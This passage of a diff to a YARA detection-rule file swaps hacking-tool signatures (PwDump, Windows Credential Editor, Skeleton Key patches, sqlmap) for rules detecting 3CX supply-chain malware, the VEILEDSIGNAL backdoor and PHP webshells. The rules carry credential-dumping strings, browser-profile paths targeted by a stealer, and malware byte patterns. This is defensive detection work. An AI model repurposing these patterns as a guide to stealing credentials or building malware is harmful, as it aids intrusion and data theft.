+               1F 18 31 13 0E 55 4F 49 4D 54 49 4C 5A 52 31 32
+               2E 37 36 56 5A 16 13 11 1F 5A 3D 1F 19 11 15 53
+               5A 39 12 08 15 17 1F 55 4B 4A 42 54 4A 54 4F 49
+               4F 43 54 4B 48 42 5A 29 1B 1C 1B 08 13 55 4F 49
+               4D 54 49 4C 7A }
+		$xc2 = { 41 49 19 02 25 1b 0f 0e 12 25 0e 15 11 1f 14 25 19 15 14 0e 1f 14 0e 47 5f 09 41 25 25 0e 0f 0e 17 1b 47 }
+		$xc3 = { 55 29 03 09 0e 1f 17 55 36 13 18 08 1b 08 03 55 39 15 08 1f 29 1f 08 0c 13 19 1f 09 55 29 03 09 0e 1f 17 2c 1f 08 09 13 15 14 54 0a 16 13 09 0e }
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Skeleton_Key_Injected_Code
+rule SIGNATURE_BASE_APT_SUSP_NK_3CX_Malicious_Samples_Mar23_1
 {
 	meta:
-		description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
-		author = "Dell SecureWorks Counter Threat Unit"
-		id = "29daaffa-cd9d-55d3-b79d-cde1c76e9e45"
-		date = "2015-01-13"
+		description = "Detects indicator (event name) found in samples related to 3CX compromise"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b233846a-19df-579b-a674-233d66824008"
+		date = "2023-03-30"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/aAk3lN"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_skeletonkey.yar#L26-L46"
+		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L216-L232"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e87cb9a49d0df6f75ca1ae51f8255ea476b699e82d525d7eca06bfda3462d84b"
+		logic_hash = "6ab8a4ac184eaba6eb56bfc49d6fa03f9b0877d75294aa9a242e9ac96482fab0"
 		score = 70
 		quality = 85
 		tags = ""
+		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
+		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
+		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
+		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
 
 	strings:
-		$injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
-		$patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
-		$patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
-		$patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
+		$a1 = "AVMonitorRefreshEvent" wide fullword
 
 	condition:
-		any of them
+		1 of them
 }
-rule SIGNATURE_BASE_Windowscredentialeditor
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_4
 {
 	meta:
-		description = "Windows Credential Editor"
-		author = "Florian Roth"
-		id = "1542c6e4-36b2-5272-85d0-43226869b43e"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L20-L32"
+		description = "Detects decrypted payload loaded inside 3CXDesktopApp.exe which downloads info stealer"
+		author = "MalGamy (Nextron Systems)"
+		id = "d11170df-570c-510c-80ec-39048acd0fbd"
+		date = "2023-03-29"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/WhichbufferArda/status/1641404343323688964?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L234-L249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "531a0bdc893d89b1c14deee11df95b430051cef07744a15b5d606e1c5378db97"
-		score = 90
+		hash = "851c2c99ebafd4e5e9e140cfe3f2d03533846ca16f8151ae8ee0e83c692884b7"
+		logic_hash = "2fd56527a094b1f155cf33af402328835d4fb8aee9a058742d3e3763acef9e46"
+		score = 80
 		quality = 85
 		tags = ""
-		threat_level = 10
 
 	strings:
-		$a = "extract the TGT session key"
-		$b = "Windows Credentials Editor"
+		$op1 = {41 69 D0 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 [4] 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 [4] 33 C1 4C 0F AF CF 4D 03 CA 45 8B D1 4C 0F AF D7 41 8D 0C 11 49 C1 E9 ?? 02 C8}
+		$op2 = {4D 0F AF CC 44 69 C2 [4] 4C 03 C9 45 8B D1 4D 0F AF D4 41 8D 0C 11 41 81 C0 [4] 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1}
+		$op3 = {33 C1 4C 0F AF C7 8B C8 C1 E1 ?? 4D 03 C2 33 C1}
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_Amplia_Security_Tool : FILE
+rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Backdoor_Mar23 : FILE
 {
 	meta:
-		description = "Detects Amplia Security Tool like Windows Credential Editor"
-		author = "Florian Roth"
-		id = "4ad83f34-561d-53ce-9766-e21700354da7"
-		date = "2013-01-01"
-		modified = "2023-02-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L34-L55"
+		description = "Detects 3CXDesktopApp MacOS Backdoor component"
+		author = "X__Junior (Nextron Systems)"
+		id = "80046c8e-0c2a-5885-b140-a6084f48160d"
+		date = "2023-03-30"
+		modified = "2023-12-05"
+		reference = "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ca32d8df0011f23922c6566b28aa55b0756d5b67bf3db8908b206b1038bb1f2"
-		score = 60
+		hash = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
+		logic_hash = "777a0a29c376f3697021dd627e716c31bda7933c5f40a8fe79b80e3cea46ce43"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		nodeepdive = 1
 
 	strings:
-		$a = "Amplia Security"
-		$c = "getlsasrvaddr.exe"
-		$d = "Cannot get PID of LSASS.EXE"
-		$e = "extract the TGT session key"
-		$f = "PPWDUMP_DATA"
+		$sa1 = "%s/.main_storage" ascii fullword
+		$sa2 = "%s/UpdateAgent" ascii fullword
+		$op1 = { 31 C0 41 80 34 06 ?? 48 FF C0 48 83 F8 ?? 75 ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F7 48 89 D9 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 F7 5B 41 5E 41 5F E9 ?? ?? ?? ?? 5B 41 5E 41 5F C3}
+		$op2 = { 0F 11 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 31 C0 80 B4 04 ?? ?? ?? ?? ?? 48 FF C0}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 2 of them ) or 3 of them
+		(( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 6MB and ( ( 1 of ( $sa* ) and 1 of ( $op* ) ) or all of ( $sa* ) ) ) or ( all of ( $op* ) )
 }
-rule SIGNATURE_BASE_Pwdump
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_ICONIC_Stealer_Mar23_1 : FILE
 {
 	meta:
-		description = "PwDump 6 variant"
-		author = "Marc Stroebel"
-		id = "e557e548-53e8-5098-93d4-8e899384e67c"
-		date = "2014-04-24"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L58-L72"
+		description = "Detects ICONIC stealer payload used in the 3CX incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e92b5b90-1146-5235-9711-a4d42689c49b"
+		date = "2023-03-31"
+		modified = "2023-12-05"
+		reference = "https://github.com/volexity/threat-intel/blob/main/2023/2023-03-30%203CX/attachments/iconicstealer.7z"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L279-L304"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a998d16f84e8689f182f6665ad165c6ff19e25d3e52acc10ca4cc6fe54ba354f"
-		score = 70
+		logic_hash = "1f57a2af4a5b9e71e2b72ddc3839400731d9d37eb4349c393b37b3f86c0c7f73"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423"
 
 	strings:
-		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"
-		$s6 = "Unable to query service status. Something is wrong, please manually check the st"
-		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword
+		$s1 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\": \"%d.%d.%d\"}" wide fullword
+		$s2 = "******************************** %s ******************************" wide fullword
+		$s3 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" wide fullword
+		$s4 = "AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide fullword
+		$s5 = "SELECT url, title FROM urls ORDER BY id DESC LIMIT 500" wide fullword
+		$s6 = "TEXT value in %s.%s" ascii fullword
+		$op1 = { 48 63 d1 48 63 ce 49 03 d1 49 03 cd 4c 63 c7 e8 87 1f 09 00 8b 45 d0 44 8d 04 37 }
+		$op2 = { 48 8b c8 8b 56 f0 48 89 46 d8 e8 78 8f f8 ff e9 ec 13 00 00 c7 46 20 ff ff ff ff e9 e0 13 00 00 33 ff }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 4 of them or 6 of them
 }
-rule SIGNATURE_BASE_Pscan_Portscan_1
+rule SIGNATURE_BASE_APT_MAL_NK_3CX_Macos_Elextron_App_Mar23_1 : FILE
 {
 	meta:
-		description = "PScan - Port Scanner"
-		author = "F. Roth"
-		id = "54997776-644b-5a72-b08c-7174b7dc7f66"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L74-L86"
+		description = "Detects macOS malware used in the 3CX incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7a3755d4-37e5-5d3b-93aa-34edb557f2d5"
+		date = "2023-03-31"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L306-L328"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c624fcdf28506b551bf7b36883d95b279a7c56322337a0acafd91205659c92cc"
-		score = 50
+		logic_hash = "00dd28c3edd94e04e35ee9e3a43c30b5a0a1ad21ec8ecf2099bbeb9de2fca8d0"
+		score = 80
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
+		hash2 = "f7ba7f9bf608128894196cf7314f68b78d2a6df10718c8e0cd64dbe3b86bc730"
 
 	strings:
-		$a = "00050;0F0M0X0a0v0}0"
-		$b = "vwgvwgvP76"
-		$c = "Pr0PhOFyP"
+		$a1 = "com.apple.security.cs.allow-unsigned-executable-memory" ascii
+		$a2 = "com.electron.3cx-desktop-app" ascii fullword
+		$s1 = "s8T/RXMlALbXfowom9qk15FgtdI=" ascii
+		$s2 = "o8NQKPJE6voVZUIGtXihq7lp0cY=" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0xfacf and filesize < 400KB and ( all of ( $a* ) and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Hacktool_Samples
+rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Updateagent_Mar23 : FILE
 {
 	meta:
-		description = "Hacktool"
-		author = "Florian Roth"
-		id = "ecacf84a-f66c-5c21-ae4b-fd9bfb5be384"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L88-L122"
+		description = "Detects 3CXDesktopApp MacOS UpdateAgent backdoor component"
+		author = "Florian Roth (Nextron Systems)"
+		id = "596eb6d0-f96f-5106-ae67-9372d238e4cf"
+		date = "2023-03-30"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/patrickwardle/status/1641692164303515653?s=20"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L330-L354"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0064950d88eccbe670cd1dc70861d093c7f49f8f10e984aef4cfb4bcc94e4645"
-		score = 50
-		quality = 83
-		tags = ""
+		hash = "9e9a5f8d86356796162cee881c843cde9eaedfb3"
+		logic_hash = "0818a8f0b59a9baaefaa0b505f8261e0e0df283e79da8e95dc71e9afdca224ab"
+		score = 80
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$a = "Unable to uninstall the fgexec service"
-		$b = "Unable to set socket to sniff"
-		$c = "Failed to load SAM functions"
-		$d = "Dump system passwords"
-		$e = "Error opening sam hive or not valid file"
-		$f = "Couldn't find LSASS pid"
-		$g = "samdump.dll"
-		$h = "WPEPRO SEND PACKET"
-		$i = "WPE-C1467211-7C89-49c5-801A-1D048E4014C4"
-		$j = "Usage: unshadow PASSWORD-FILE SHADOW-FILE"
-		$k = "arpspoof\\Debug"
-		$l = "Success: The log has been cleared"
-		$m = "clearlogs [\\\\computername"
-		$n = "DumpUsers 1."
-		$o = "dictionary attack with specified dictionary file"
-		$p = "by Objectif Securite"
-		$q = "objectif-securite"
-		$r = "Cannot query LSA Secret on remote host"
-		$s = "Cannot write to process memory on remote host"
-		$t = "Cannot start PWDumpX service on host"
-		$u = "usage: %s <system hive> <security hive>"
-		$v = "username:domainname:LMhash:NThash"
-		$w = "<server_name_or_ip> | -f <server_list_file> [username] [password]"
-		$x = "Impersonation Tokens Available"
-		$y = "failed to parse pwdump format string"
-		$z = "Dumping password"
+		$a1 = "/3CX Desktop App/.main_storage" ascii
+		$x1 = ";3cx_auth_token_content=%s;__tutma=true"
+		$s1 = "\"url\": \"https://"
+		$s3 = "/dev/null"
+		$s4 = "\"AccountName\": \""
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0xfeca and filesize < 6MB and ( 1 of ( $x* ) or ( $a1 and all of ( $s* ) ) ) or all of them
 }
-rule SIGNATURE_BASE_Fierce2
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_2
 {
 	meta:
-		description = "This signature detects the Fierce2 domain scanner"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08a72151-48c2-513b-995f-be0d5acba7dd"
-		date = "2014-01-07"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L126-L139"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "ff1fa0bd-19b7-553a-9506-bc5aa5d29056"
+		date = "2023-04-29"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L373-L392"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "05502827dd5d1903507fd1e176d518516a5c1965fb4e51ea26b1a05eb0dce3d2"
-		score = 60
+		hash = "c4887a5cd6d98e273ba6e9ea3c1d8f770ef26239819ea24a1bfebd81d6870505"
+		logic_hash = "a15f7f06be5e620baf33d595afc35246dae0307978984af832940a74ef2c84eb"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,"
+		$sa1 = "\\.\\pipe\\gecko.nativeMessaging" ascii
+		$sa2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40" ascii
+		$sa3 = "application/json, text/javascript, */*; q=0.01" ascii
+		$op1 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
+		$op2 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
+		$op3 = { 48 89 74 24 ?? 45 33 C0 89 74 24 ?? 41 B9 ?? ?? ?? ?? 89 74 24 ?? 48 8B D8 48 C7 00 ?? ?? ?? ?? 48 8B 0F 41 8D 50 ?? 48 89 44 24 ?? 89 74 24 ?? FF 15}
 
 	condition:
-		1 of them
+		all of ( $op* ) or all of ( $sa* )
 }
-rule SIGNATURE_BASE_Ncrack
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_3
 {
 	meta:
-		description = "This signature detects the Ncrack brute force tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c1c56ee9-7f76-5440-b0e0-86e372c53340"
-		date = "2014-01-07"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L141-L154"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "6b6f984e-242a-5b84-baa9-6311992cde9b"
+		date = "2023-04-29"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L394-L410"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a42bfaefb873a10821bcc06db109d8ab20daa8c8ac0b6cfb245d2ee339f318bb"
-		score = 60
+		hash = "595392959b609caf088d027a23443cf2fefd043607ccdec3de19ad3bb43a74b1"
+		logic_hash = "58f860926db4a7dfefbd39ee35efaa0081b7e31a361efce02f5144266ab652a6"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "NcrackOutputTable only supports adding up to 4096 to a cell via"
+		$op1 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
+		$op2 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
+		$op3 = { 8B 54 24 ?? 4C 8D 4C 24 ?? 45 8D 46 ?? 44 89 74 24 ?? 48 8B CB FF 15}
+		$op4 = { 48 8D 44 24 ?? 45 33 C9 41 B8 01 00 00 40 48 89 44 24 ?? 41 8B D5 48 8B CF FF 15}
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Sqlmap
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_4
 {
 	meta:
-		description = "This signature detects the SQLMap SQL injection tool"
-		author = "Florian Roth (Nextron Systems)"
-		id = "55a72fe6-f82d-5d55-842f-5d7e1cfcc9fa"
-		date = "2014-01-07"
-		modified = "2025-04-14"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L156-L169"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "77340ec0-36bb-5c47-995f-4e6f76b68fe1"
+		date = "2023-04-29"
+		modified = "2023-12-05"
+		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L412-L428"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9c248c856c3d91a282012489b53dc9e15569e1bb1a5c9f5e3c7938f7ce0c3157"
-		score = 60
+		hash = "9b0761f81afb102bb784b398b16faa965594e469a7fcfdfd553ced19cc17e70b"
+		logic_hash = "ad22df404d948073428fc35b0c8fbfea25da3bc66e46ea6397ff751ae65d5939"
+		score = 80
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "except SqlmapBaseException, ex:"
+		$op1 = { 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 }
+		$op2 = { 48 8B C8 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C0 4C 8D 4D ?? B2 01 41 8D 48 ?? FF D0}
+		$op3 = { 33 FF C7 44 24 ?? 38 02 00 00 33 D2 8D 4F ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 FF 74 ?? 48 8D 54 24 ?? 48 8B C8 FF 15 }
+		$op4 = { 4C 8D 05 ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8B C8 33 D2 89 4C 24 ?? FF 15 }
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_HKTL_Portscanner_Simple_Jan14
+rule SIGNATURE_BASE_WEBSHELL_PHP_Generic : FILE
 {
 	meta:
-		description = "Auto-generated rule on file PortScanner.exe"
-		author = "yarGen Yara Rule Generator by Florian Roth"
-		id = "3e8960ce-0428-51e1-b992-4fa09fee8520"
-		date = "2025-04-14"
-		modified = "2025-04-14"
-		old_rule_name = "PortScanner"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-hacktools.yar#L171-L183"
+		description = "php webshell having some kind of input and some kind of payload. restricted to small files or big ones including suspicious strings"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "294ce5d5-55b2-5c79-b0f8-b66f949efbb2"
+		date = "2021-01-14"
+		modified = "2024-12-09"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L83-L411"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b381b9212282c0c650cb4b0323436c63"
-		logic_hash = "c69269b227d46b5b970cfc094b3154b0a533b439b8ed492a2059025bc96d17a0"
-		score = 75
-		quality = 85
-		tags = ""
+		hash = "bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd"
+		hash = "6bf351900a408120bee3fc6ea39905c6a35fe6efcf35d0a783ee92062e63a854"
+		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
+		hash = "00813155bf7f5eb441e1619616a5f6b21ae31afc99caa000c4aafd54b46c3597"
+		hash = "e31788042d9cdeffcb279533b5a7359b3beb1144f39bacdd3acdef6e9b4aff25"
+		hash = "36b91575a08cf40d4782e5aebcec2894144f1e236a102edda2416bc75cbac8dd"
+		hash = "a34154af7c0d7157285cfa498734cfb77662edadb1a10892eb7f7e2fb5e2486c"
+		hash = "791a882af2cea0aa8b8379791b401bebc235296858266ddb7f881c8923b7ea61"
+		hash = "9a8ab3c225076a26309230d7eac7681f85b271d2db22bf5a190adbf66faca2e6"
+		hash = "0d3ee83adc9ebf8fb1a8c449eed5547ee5e67e9a416cce25592e80963198ae23"
+		hash = "3d8708609562a27634df5094713154d8ca784dbe89738e63951e12184ff07ad6"
+		hash = "70d64d987f0d9ab46514abcc868505d95dbf458387f858b0d7580e4ee8573786"
+		hash = "259b3828694b4d256764d7d01b0f0f36ca0526d5ee75e134c6a754d2ab0d1caa"
+		hash = "04d139b48d59fa2ef24fb9347b74fa317cb05bd8b7389aeb0a4d458c49ea7540"
+		hash = "58d0e2ff61301fe0c176b51430850239d3278c7caf56310d202e0cdbdde9ac3f"
+		hash = "731f36a08b0e63c63b3a2a457667dfc34aa7ff3a2aee24e60a8d16b83ad44ce2"
+		hash = "e4ffd4ec67762fe00bb8bd9fbff78cffefdb96c16fe7551b5505d319a90fa18f"
+		hash = "fa00ee25bfb3908808a7c6e8b2423c681d7c52de2deb30cbaea2ee09a635b7d4"
+		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
+		hash = "e9423ad8e51895db0e8422750c61ef4897b3be4292b36dba67d42de99e714bff"
+		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
+		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
+		hash = "3de8c04bfdb24185a07f198464fcdd56bb643e1d08199a26acee51435ff0a99f"
+		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
+		hash = "a09dcf52da767815f29f66cb7b03f3d8c102da5cf7b69567928961c389eac11f"
+		hash = "d9ae762b011216e520ebe4b7abcac615c61318a8195601526cfa11bbc719a8f1"
+		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
+		logic_hash = "03c1963ec7a0409970baa98dc3a62f721c092b41d4026475a38b1ef466426b75"
+		score = 70
+		quality = -134
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
